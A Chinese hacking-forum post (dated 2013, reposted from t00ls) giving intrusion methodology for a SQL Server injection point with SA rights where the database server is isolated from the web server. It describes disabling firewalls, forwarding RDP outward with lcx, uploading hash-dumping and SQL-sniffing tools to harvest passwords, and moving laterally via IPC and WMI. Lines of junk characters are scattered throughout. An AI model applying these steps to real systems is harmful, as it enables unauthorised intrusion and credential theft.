当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
3 h- p z" f2 h$ ^5 C( q
4 R7 H4 n, c6 A- G1 R. ^3 i: B* G! \: H
! V5 {1 y+ J( S1 ?SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出): y2 `& { |" e1 v8 t* Y1 p% }9 T
K6 n" ^' E$ ]+ s3 ], j
- z* f7 e9 z# P [, z一、DB机有公网IP.- _7 R$ D3 G' g1 b2 K X6 @5 V9 f( ^9 ]# S
! C& k2 Y! H7 E1 f
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.! [3 \3 p" f; L7 Z/ n8 H! _
% \, h& M- l4 N1 J5 M4 _' Z
9 M5 h' g7 a5 N: x. ~. a
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
9 \7 H }% f" h5 u; W- w& T0 W: n2 h0 E
$ P6 [, g. c6 X9 E4 d+ l3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
( q$ w9 p; y S- U- N5 H
. Y% X/ q1 @8 t3 M6 ~7 k5 _; N% W' z: f! ~, x/ } K5 f
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
) m. h5 h, h- }) T2 V: a' ~
7 x5 z5 t& r! L4 K7 [ A, W" V1 Q B9 B
* d- T( X; q4 a9 t二、DB机只有内网IP
- `% P( e# q. |" g. f: M' r: w$ V- d. D* m2 r# I) j p* i
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.2 y5 Y9 w( a2 C# ~4 `( i1 y9 U. n
7 v6 l+ ~( S& g) W$ _' X3 m5 W
/ S& v8 E' g$ W# P1 a% U2:停掉防火墙和IP策略再从内往外扫描.1 |" h* m) @; W" q. F
% c1 A+ R: G* g. Q6 l- S
4 E! @+ k! B \# u8 u0 A3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.9 z& `9 t1 y5 H' ?! C( T( w
3 d, c0 N9 Z0 B/ D& S% D% y* f7 N- _# j* c( h7 O8 Y+ m: R
4:学会密码规律分析往往会有惊喜.) I% ]6 q, {+ t- j; F6 W7 _
1 }! e+ c$ W0 S0 B& v0 w/ B4 ~! T( i( X& X2 s
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等# K' t/ J7 U: X3 w
+ N# B! S9 R; ]# a1 R" ^3 n6 q3 g$ y
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对